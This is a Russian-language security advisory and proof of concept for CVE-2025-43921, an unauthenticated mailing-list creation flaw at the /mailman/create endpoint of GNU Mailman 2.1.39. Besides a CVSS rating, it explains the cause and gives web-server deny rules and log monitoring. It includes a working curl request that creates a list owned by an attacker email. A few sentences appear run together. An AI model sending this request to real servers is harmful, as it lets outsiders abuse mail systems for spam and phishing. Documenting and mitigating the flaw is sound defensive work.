
Эксплойт Proof-of-concept и технический анализ для CVE-2025-43921, обход аутентификации в GNU Mailman 2.1.39, позволяющий создание списков рассылки без аутентификации через конечную точку /mailman/create.
Обнаружено: Firudin Davudzada и Musazada Aydan
Дата раскрытия: апрель 2025
CVE ID: CVE-2025-43921
Серьезность: 5.3 Средний (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
Тип атаки: Удаленная
Затронутое ПО: GNU Mailman 2.1.39 (поставляется с cPanel/WHM)
GNU Mailman 2.1.39, поставляемый с cPanel и WHM, подвержен уязвимости обхода аутентификации, которая позволяет неаутентифицированным злоумышленникам создавать списки рассылки через конечную точку /mailman/create. Проблема вызвана отсутствием контроля доступа в CGI-скрипте create, что позволяет злоумышленникам злоупотреблять системой рассылки для спама, фишинга или исчерпания ресурсов.
Данная уязвимость согласуется с историческими проблемами контроля доступа в Mailman, такими как неверные разрешения на управление списками в Postorius. Она может быть объединена с CVE-2025-43920 для усиления воздействия, создавая платформу для более масштабных атак.
create CGI-скрипт (обрабатывает запросы на создание списков)Mailman/Handlers/ (логика управления списками)/mailman/create, что позволяет произвольно создавать списки.Следующая команда создает список рассылки с именем hacked:
curl http://target/mailman/create -d "listname=hacked&[email protected]&password=1234&confirm=1234"
Ожидаемый результат: Будет создан новый список рассылки, управляемый указанным злоумышленником email владельца.
/mailman/create с поддельными параметрами для создания списков рассылки.Заблокировать доступ к конечной точке: Настройте веб-сервер для ограничения доступа к /mailman/create:
location /mailman/create {
deny all;
return 403;
}
Или для Apache:
<Location "/mailman/create">
Deny from all
</Location>
Мониторинг журналов: Проверьте журналы на предмет попыток несанкционированного создания списков:
tail -f /var/log/mailman/* | grep "newlist"
/mailman/create для предотвращения злоупотреблений.Firudin Davudzada и Musazada Aydan ответственно раскрыли эту уязвимость в ходе санкционированного тестирования на проникновение. Спасибо команде MITRE CVE за координацию.
Email: [email protected]\